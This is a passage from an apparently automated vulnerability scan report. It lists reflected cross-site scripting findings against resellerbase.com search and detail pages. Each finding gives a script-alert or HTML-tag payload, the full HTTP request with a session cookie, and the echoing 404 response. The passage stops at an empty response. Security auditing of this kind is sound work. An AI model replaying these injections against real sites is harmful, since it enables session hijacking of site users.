2.1901. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 603fb<script>alert(1)</script>c6a3bb77e71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes603fb<script>alert(1)</script>c6a3bb77e71/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes603fb<script>alert(1)</script>c6a3bb77e71/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1902. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 128ba<script>alert(1)</script>42aa5ed8965 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos128ba<script>alert(1)</script>42aa5ed8965/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos128ba<script>alert(1)</script>42aa5ed8965/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1903. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4e6c5<script>alert(1)</script>05200adce96 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/search.php4e6c5<script>alert(1)</script>05200adce96?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/search.php4e6c5<script>alert(1)</script>05200adce96?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1904. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 691b3<a>9100540cd6e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search691b3<a>9100540cd6e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search691b3<a>9100540cd6e&opt=2 was not found on this server.</p>
...[SNIP]...

2.1905. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8a0e3<a>fbc7e5452a3 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/search.php?keyword=search...8a0e3<a>fbc7e5452a3&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/search.php?keyword=search...8a0e3<a>fbc7e5452a3&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1906. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 43023<script>alert(1)</script>4849a76c2bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&43023<script>alert(1)</script>4849a76c2bc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&43023<script>alert(1)</script>4849a76c2bc=1 was not found on this server.</p>
...[SNIP]...

2.1907. http://www.resellerbase.com/detail/23/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 29fd9<a>f1fa84db1fe was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=229fd9<a>f1fa84db1fe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=229fd9<a>f1fa84db1fe was not found on this server.</p>
...[SNIP]...

2.1908. http://www.resellerbase.com/detail/23/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 441a5<script>alert(1)</script>bb50162bb4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail441a5<script>alert(1)</script>bb50162bb4e/23/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail441a5<script>alert(1)</script>bb50162bb4e/23/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1909. http://www.resellerbase.com/detail/23/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5741f<script>alert(1)</script>360f62bbc02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/235741f<script>alert(1)</script>360f62bbc02/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/235741f<script>alert(1)</script>360f62bbc02/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1910. http://www.resellerbase.com/detail/23/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1802a<script>alert(1)</script>227dd8d0303 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes1802a<script>alert(1)</script>227dd8d0303/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes1802a<script>alert(1)</script>227dd8d0303/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1911. http://www.resellerbase.com/detail/23/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f2f9d<script>alert(1)</script>07f307e4b68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/search.phpf2f9d<script>alert(1)</script>07f307e4b68?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/search.phpf2f9d<script>alert(1)</script>07f307e4b68?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1912. http://www.resellerbase.com/detail/23/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 339f5<a>15d5d7af93e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/search.php?keyword=search...&Submit3=Search339f5<a>15d5d7af93e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/search.php?keyword=search...&Submit3=Search339f5<a>15d5d7af93e&opt=2 was not found on this server.</p>
...[SNIP]...

2.1913. http://www.resellerbase.com/detail/23/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ed351<a>d6a224daaba was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/search.php?keyword=search...ed351<a>d6a224daaba&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/search.php?keyword=search...ed351<a>d6a224daaba&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1914. http://www.resellerbase.com/detail/23/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 946aa<script>alert(1)</script>0f3f6763a98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/search.php?keyword=search...&Submit3=Search&opt=2&946aa<script>alert(1)</script>0f3f6763a98=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/search.php?keyword=search...&Submit3=Search&opt=2&946aa<script>alert(1)</script>0f3f6763a98=1 was not found on this server.</p>
...[SNIP]...

2.1915. http://www.resellerbase.com/detail/23/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 1e748<a>9d13021953a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/23/themes/search.php?keyword=search...&Submit3=Search&opt=21e748<a>9d13021953a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/search.php?keyword=search...&Submit3=Search&opt=21e748<a>9d13021953a was not found on this server.</p>
...[SNIP]...

2.1916. http://www.resellerbase.com/detail/24/concentric-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/24/concentric-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e17c2<script>alert(1)</script>32fffacfe25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile17c2<script>alert(1)</script>32fffacfe25/24/concentric-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile17c2<script>alert(1)</script>32fffacfe25/24/concentric-com.html was not found on this server.</p>
...[SNIP]...

2.1917. http://www.resellerbase.com/detail/24/concentric-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/24/concentric-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f61f8<script>alert(1)</script>510821a0b4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/24/f61f8<script>alert(1)</script>510821a0b4a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/24/f61f8<script>alert(1)</script>510821a0b4a was not found on this server.</p>
...[SNIP]...

2.1918. http://www.resellerbase.com/detail/25/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/25/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6ab9<script>alert(1)</script>a776e4c884e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf6ab9<script>alert(1)</script>a776e4c884e/25/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf6ab9<script>alert(1)</script>a776e4c884e/25/ was not found on this server.</p>
...[SNIP]...

2.1919. http://www.resellerbase.com/detail/25/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/25/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 93bf4<script>alert(1)</script>7e63dc10a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2593bf4<script>alert(1)</script>7e63dc10a1d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

